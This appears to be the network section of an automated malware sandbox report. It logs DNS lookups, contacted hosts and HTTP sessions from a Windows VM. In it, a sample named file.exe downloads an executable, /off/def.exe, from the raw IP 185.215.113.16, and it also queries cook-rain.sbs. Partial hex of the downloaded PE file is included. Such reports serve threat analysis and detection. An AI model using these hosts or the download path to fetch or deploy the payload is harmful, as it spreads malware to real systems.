                                                                                                                                                                        Nov 21, 2024 10:38:00.843924046 CET4969153192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:01.070419073 CET53496911.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.070441008 CET53553711.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.838701010 CET6266153192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:03.838922024 CET6041853192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:07.052299023 CET5322253192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:07.052500010 CET5400953192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:12.090329885 CET53554231.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.752763987 CET5139453192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:13.753102064 CET5125553192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:38:16.292315960 CET53540291.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.024930954 CET53655311.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.264209032 CET53603881.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.485658884 CET53532521.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:26.109675884 CET53581891.1.1.1192.168.2.6
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Nov 21, 2024 10:37:19.039633036 CET192.168.2.61.1.1.10x11f2Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:00.843616962 CET192.168.2.61.1.1.10x2438Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:00.843924046 CET192.168.2.61.1.1.10xe97cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:03.838701010 CET192.168.2.61.1.1.10x8c01Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:03.838922024 CET192.168.2.61.1.1.10x7b2cStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.052299023 CET192.168.2.61.1.1.10xb32cStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.052500010 CET192.168.2.61.1.1.10x5063Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:13.752763987 CET192.168.2.61.1.1.10x2037Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:13.753102064 CET192.168.2.61.1.1.10x79f1Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Nov 21, 2024 10:37:14.628050089 CET1.1.1.1192.168.2.60x211fNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:37:14.628050089 CET1.1.1.1192.168.2.60x211fNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:37:19.299619913 CET1.1.1.1192.168.2.60x11f2No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:37:19.299619913 CET1.1.1.1192.168.2.60x11f2No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:01.070419073 CET1.1.1.1192.168.2.60xe97cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:01.070441008 CET1.1.1.1192.168.2.60x2438No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.065727949 CET1.1.1.1192.168.2.60x1b65No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.065727949 CET1.1.1.1192.168.2.60x1b65No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.065727949 CET1.1.1.1192.168.2.60x1b65No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.066359997 CET1.1.1.1192.168.2.60x8c01No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.066359997 CET1.1.1.1192.168.2.60x8c01No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.066359997 CET1.1.1.1192.168.2.60x8c01No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.066359997 CET1.1.1.1192.168.2.60x8c01No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.092780113 CET1.1.1.1192.168.2.60x7e38No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.111967087 CET1.1.1.1192.168.2.60x7b2cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:04.111967087 CET1.1.1.1192.168.2.60x7b2cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:06.903584957 CET1.1.1.1192.168.2.60x9072No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:06.903665066 CET1.1.1.1192.168.2.60x504cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:06.903665066 CET1.1.1.1192.168.2.60x504cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:06.903665066 CET1.1.1.1192.168.2.60x504cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.284998894 CET1.1.1.1192.168.2.60xb32cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.284998894 CET1.1.1.1192.168.2.60xb32cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.284998894 CET1.1.1.1192.168.2.60xb32cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.284998894 CET1.1.1.1192.168.2.60xb32cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.286936045 CET1.1.1.1192.168.2.60x5063No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:07.286936045 CET1.1.1.1192.168.2.60x5063No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:13.981354952 CET1.1.1.1192.168.2.60x79f1No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:13.981722116 CET1.1.1.1192.168.2.60x2037No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:18.559072018 CET1.1.1.1192.168.2.60x635fNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:18.579106092 CET1.1.1.1192.168.2.60xf383No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:25.446428061 CET1.1.1.1192.168.2.60x8f7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 21, 2024 10:38:25.448139906 CET1.1.1.1192.168.2.60xf08aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        • otelrules.azureedge.net
                                                                                                                                                                        • cook-rain.sbs
                                                                                                                                                                        • slscr.update.microsoft.com
                                                                                                                                                                        • fs.microsoft.com
                                                                                                                                                                        • https:
                                                                                                                                                                          • wcpstatic.microsoft.com
                                                                                                                                                                          • js.monitor.azure.com
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.649787185.215.113.16804540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Nov 21, 2024 10:37:43.303541899 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.699290037 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:44 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 2846720
                                                                                                                                                                        Last-Modified: Thu, 21 Nov 2024 08:20:50 GMT
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        ETag: "673eed62-2b7000"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 9f ac 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,+`Ui` @ @.rsrc`2@.idata 8@eqojrudu ++:@afofncra +J+@.taggant@+"N+@
                                                                                                                                                                        Nov 21, 2024 10:37:44.699409962 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699421883 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699438095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699449062 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699459076 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699470043 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 21, 2024 10:37:44.699490070 CET1236INData Raw: 65 2c 1f 1a 2d 09 1c e5 c3 f8 1d 5d b4 ae fa 0a 68 d5 00 fb 26 f3 f1 ba f9 3e d0 db 7d d3 5f e5 0b c0 c9 76 83 b1 a0 3a 5c 79 da 14 93 f7 8b da d6 3f 3c 0b 1b 42 13 cf c6 f1 18 d1 d6 47 57 e8 d2 2a 2c 1b 2d 45 28 33 29 4e 3f d5 b8 48 19 6a 0b a1
                                                                                                                                                                        Data Ascii: e,-]h&>}_v:\y?<BGW*,-E(3)N?Hj(RRPq.$}2G@-,,]!-NjElmLRP%x340IMH-/u1z5/6K*SvHi1$6D%33J&)b6D%NHU*Zm$
                                                                                                                                                                        Nov 21, 2024 10:37:44.699501038 CET1236INData Raw: 59 2d 36 35 71 2d 3a f9 67 98 bd 14 ae 60 30 8c 07 58 2c 11 35 f3 d1 fb f6 c5 d9 24 d1 00 2a 1a 07 58 ea fa 64 20 ee 17 60 33 a8 9c d1 2d f6 1a 07 0c 36 4d 35 04 06 07 23 c9 0b 51 09 60 92 f3 36 61 ca 70 ae ac 22 a3 d1 c0 41 1a 47 51 aa 6c 3f 68
                                                                                                                                                                        Data Ascii: Y-65q-:g`0X,5$*Xd `3-6M5#Q`6ap"AGQl?h8WcZlH-)?tsDXn rq0eJyqT3HZ,QF0X[@Q8u-*4o#o(?SXX\=ZD*DT+
                                                                                                                                                                        Nov 21, 2024 10:37:44.699512959 CET1236INData Raw: 10 4a 2f 24 3b e8 35 e8 13 25 66 1a bc a4 20 86 c2 33 34 4d 01 3d da c3 ad 16 e1 3b 22 88 0a b7 2b 65 e0 49 c3 a9 d3 d5 55 17 8b e7 e6 52 eb b3 17 40 0a 2b b1 23 a7 38 d7 30 90 38 26 13 06 70 3f 3d 02 0c d5 17 fa 21 c0 7a c9 19 49 dd 4e 69 84 a6
                                                                                                                                                                        Data Ascii: J/$;5%f 34M=;"+eIUR@+#808&p?=!zINizL*M>`*g GQ6J*h=>C"?bZ#&t/:?gIu:d:D8=rA"3+yU-X%|4$a2#"W/?&kExS/@\2
                                                                                                                                                                        Nov 21, 2024 10:37:44.820293903 CET1236INData Raw: c9 05 7f c0 df 54 11 f1 e2 c8 1a d6 a9 34 d4 f9 b2 3d 20 5a b3 54 f6 ec b5 5a 82 44 b0 45 7d 09 b3 44 f8 1e 06 51 c4 a7 34 89 8c 53 12 83 32 8c 08 6e 0d 16 10 22 3e dd 06 32 24 26 29 11 02 1f b9 0f fc 17 23 13 f7 cb 87 4d 1d aa 77 27 01 58 27 88
                                                                                                                                                                        Data Ascii: T4= ZTZDE}DQ4S2n">2$&)#Mw'X'+3PKRJNAk`6FFPLwnI]gK\@f2)*`qL>@NEJy&XYd2084G)-JT%%=FBiL-O>8qR


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        0192.168.2.64971040.113.103.199443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:12 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 4f 4c 7a 4c 77 4b 4c 4d 30 57 51 44 58 31 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 35 37 35 62 30 63 64 37 64 35 36 31 62 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: IOLzLwKLM0WQDX1i.1Context: 131575b0cd7d561b
                                                                                                                                                                        2024-11-21 09:37:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:12 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 4f 4c 7a 4c 77 4b 4c 4d 30 57 51 44 58 31 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 35 37 35 62 30 63 64 37 64 35 36 31 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6f 4a 67 77 33 78 62 6a 73 61 31 2b 45 45 5a 34 43 58 6d 57 77 51 41 64 6a 45 56 34 6b 49 75 52 78 36 36 73 4d 52 6e 39 74 6d 58 46 31 73 70 4d 7a 31 33 6d 59 43 63 55 68 6e 57 5a 6f 41 5a 30 37 58 31 39 6f 75 44 71 2f 6d 71 63 38 69 4b 61 55 4d 31 67 55 34 7a 35 70 71 47 76 54 39 50 37 58 4d 58 43 53 4e 74 75 70 6d 72 53
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: IOLzLwKLM0WQDX1i.2Context: 131575b0cd7d561b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXoJgw3xbjsa1+EEZ4CXmWwQAdjEV4kIuRx66sMRn9tmXF1spMz13mYCcUhnWZoAZ07X19ouDq/mqc8iKaUM1gU4z5pqGvT9P7XMXCSNtupmrS
                                                                                                                                                                        2024-11-21 09:37:12 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 49 4f 4c 7a 4c 77 4b 4c 4d 30 57 51 44 58 31 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 35 37 35 62 30 63 64 37 64 35 36 31 62 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: IOLzLwKLM0WQDX1i.3Context: 131575b0cd7d561b
                                                                                                                                                                        2024-11-21 09:37:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 45 63 57 53 48 6c 52 70 7a 55 61 77 6b 43 42 36 41 30 4d 64 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: EcWSHlRpzUawkCB6A0MdQA.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        1192.168.2.64971240.113.103.199443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:14 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 75 39 31 51 49 66 72 44 30 47 52 32 46 54 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 62 63 35 61 33 63 34 30 36 39 39 35 37 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 4u91QIfrD0GR2FTA.1Context: ecbc5a3c40699570
                                                                                                                                                                        2024-11-21 09:37:14 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:14 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 34 75 39 31 51 49 66 72 44 30 47 52 32 46 54 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 62 63 35 61 33 63 34 30 36 39 39 35 37 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 4u91QIfrD0GR2FTA.2Context: ecbc5a3c40699570<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                                                                                                                                        2024-11-21 09:37:14 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 75 39 31 51 49 66 72 44 30 47 52 32 46 54 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 62 63 35 61 33 63 34 30 36 39 39 35 37 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4u91QIfrD0GR2FTA.3Context: ecbc5a3c40699570<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                        2024-11-21 09:37:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 6c 37 59 31 37 57 44 72 30 71 6d 70 54 4e 66 41 2f 47 6f 49 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
